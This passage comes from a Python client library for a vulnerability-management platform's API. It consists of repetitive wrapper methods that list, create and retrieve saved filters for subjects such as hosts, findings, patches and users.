:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.PATCH, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_tag_filters(self, client_id=None):
"""
List tag filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.TAG, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_unique_appfinding_filters(self, client_id=None):
"""
List unique application finding filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.UNIQUE_APPLICATION_FINDING, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_unique_hostfinding_filters(self, client_id=None):
"""
List unique host finding filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.UNIQUE_HOST_FINDING, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_user_filters(self, client_id=None):
"""
List user filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.USER, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_system_filters(self, filter_subject, client_id=None):
"""
List System Filters.
:param filter_subject: Supported Subjects are:
FilterSubject.APPLICATION
FilterSubject.APPLICATION_FINDING
FilterSubject.APPLICATION_MANUAL_EXPLOIT
FilterSubject.APPLICATION_URL
FilterSubject.ASSESSMENT
FilterSubject.CLIENT
FilterSubject.DATABASE
FilterSubject.DATABASE_FINDING
FilterSubject.GROUP
FilterSubject.HOST
FilterSubject.HOST_FINDING
FilterSubject.HOST_MANUAL_EXPLOIT
FilterSubject.NETWORK
FilterSubject.PATCH
FilterSubject.TAG
FilterSubject.UNIQUE_APPLICATION_FINDING
FilterSubject.UNIQUE_HOST_FINDING
FilterSubject.USER
:type filter_subject: str
:param client_id: Client ID
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
url = self.api_base_url.format(str(client_id)) + "/{}/filter".format(filter_subject)
try:
raw_response = self.request_handler.make_request(ApiRequestHandler.GET, url)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
jsonified_response = json.loads(raw_response.text)
return jsonified_response
def get_specific_sys_filter(self, filter_subject, filter_id, client_id=None):
"""
Get a specific system filter.
:param filter_subject: Supported Subjects are:
FilterSubject.APPLICATION
FilterSubject.APPLICATION_FINDING
FilterSubject.APPLICATION_MANUAL_EXPLOIT
FilterSubject.APPLICATION_URL
FilterSubject.ASSESSMENT
FilterSubject.CLIENT
FilterSubject.DATABASE
FilterSubject.DATABASE_FINDING
FilterSubject.GROUP
FilterSubject.HOST
FilterSubject.HOST_FINDING
FilterSubject.HOST_MANUAL_EXPLOIT
FilterSubject.NETWORK
FilterSubject.PATCH
FilterSubject.TAG
FilterSubject.UNIQUE_APPLICATION_FINDING
FilterSubject.UNIQUE_HOST_FINDING
FilterSubject.USER
:type filter_subject: str
:param filter_id: Filter ID to get
:type filter_id: int
:param client_id: Client ID
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
url = self.api_base_url.format(str(client_id)) + "/{}/filter/{}".format(filter_subject, str(filter_id))
try:
raw_response = self.request_handler.make_request(ApiRequestHandler.GET, url)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
jsonified_response = json.loads(raw_response.text)
return jsonified_response
def create(self, filter_subject, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved filter.
:param filter_subject: Supported Subjects are:
FilterSubject.APPLICATION
FilterSubject.APPLICATION_FINDING
FilterSubject.APPLICATION_MANUAL_EXPLOIT
FilterSubject.APPLICATION_URL
FilterSubject.ASSESSMENT
FilterSubject.CLIENT
FilterSubject.DATABASE
FilterSubject.DATABASE_FINDING
FilterSubject.GROUP
FilterSubject.HOST
FilterSubject.HOST_FINDING
FilterSubject.HOST_MANUAL_EXPLOIT
FilterSubject.NETWORK
FilterSubject.PATCH
FilterSubject.TAG
FilterSubject.UNIQUE_APPLICATION_FINDING
FilterSubject.UNIQUE_HOST_FINDING
FilterSubject.USER
:type filter_subject: str
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
url = self.alt_api_base_url.format(str(client_id), filter_subject)
body = {
"name": filter_name,
"filters": filter_list,
"shared": shared
}
try:
raw_response = self.request_handler.make_request(ApiRequestHandler.POST, url, body=body)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
jsonified_response = json.loads(raw_response.text)
filter_id = jsonified_response['id']
return filter_id
def create_application_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved application filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.APPLICATION, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_appfinding_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved application finding filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.APPLICATION_FINDING, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_app_manual_exploit_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved application manual exploit filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.APPLICATION_MANUAL_EXPLOIT, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_application_url_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved application URL filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.APPLICATION_URL, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_assessment_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved assessment filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.ASSESSMENT, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_client_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved client filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.CLIENT, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_database_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved database filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.DATABASE, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_dbfinding_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved database finding filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.DATABASE_FINDING, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_group_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved group filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.GROUP, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_host_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved host filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.HOST, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_hostfinding_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved host finding filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.HOST_FINDING, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_host_manual_exploit_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved host manual exploit filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.HOST_MANUAL_EXPLOIT, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_network_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved network filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.NETWORK, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_patch_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved patch filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.PATCH, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_tag_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved tag filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.TAG, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_unique_appfinding_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved unique application finding filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.UNIQUE_APPLICATION_FINDING, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_unique_hostfinding_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved unique host finding filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.UNIQUE_HOST_FINDING, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_user_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved user filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.USER, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_filter(self, filter_subject, filter_id, client_id=None):
"""
Gets the details for a saved filter.
:param filter_subject: Supported Subjects are:
FilterSubject.APPLICATION
FilterSubject.APPLICATION_FINDING
FilterSubject.APPLICATION_MANUAL_EXPLOIT
FilterSubject.APPLICATION_URL
FilterSubject.ASSESSMENT
FilterSubject.CLIENT
FilterSubject.DATABASE
FilterSubject.DATABASE_FINDING
FilterSubject.GROUP
FilterSubject.HOST
FilterSubject.HOST_FINDING
FilterSubject.HOST_MANUAL_EXPLOIT
FilterSubject.NETWORK
FilterSubject.PATCH
FilterSubject.TAG
FilterSubject.UNIQUE_APPLICATION_FINDING
FilterSubject.UNIQUE_HOST_FINDING
FilterSubject.USER
:type filter_subject: FilterSubject attributes
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
url = self.alt_api_base_url.format(str(client_id), filter_subject) + "/{}".format(str(filter_id))
try:
raw_response = self.request_handler.make_request(ApiRequestHandler.GET, url)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
jsonified_response = json.loads(raw_response.text)
return jsonified_response
def get_application_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved application filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.APPLICATION, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_appfinding_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved application finding filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.APPLICATION_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_app_manual_exploit_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved application manual exploit filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.APPLICATION_MANUAL_EXPLOIT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_application_url_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved application manual exploit filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.APPLICATION_URL, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_assessment_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved assessment filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.ASSESSMENT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_client_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved client filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.CLIENT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_database_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved database filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.DATABASE, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_databasefinding_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved database finding filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.DATABASE_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_group_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved group filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.GROUP, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_host_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved host filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.HOST, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_hostfinding_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved host finding filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.HOST_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_host_manual_exploit_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved host manual exploit filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.HOST_MANUAL_EXPLOIT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_network_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved network filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.NETWORK, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_patch_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved patch filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.PATCH, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_tag_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved tag filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.TAG, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_unique_app_finding_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved unique application finding filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.get_filter(FilterSubject.UNIQUE_APPLICATION_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def get_unique_host_finding_filter(self, filter_id, client_id=None):
"""
Gets the details for a saved unique host finding filter.
:param filter_id: The filter ID to get details for.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
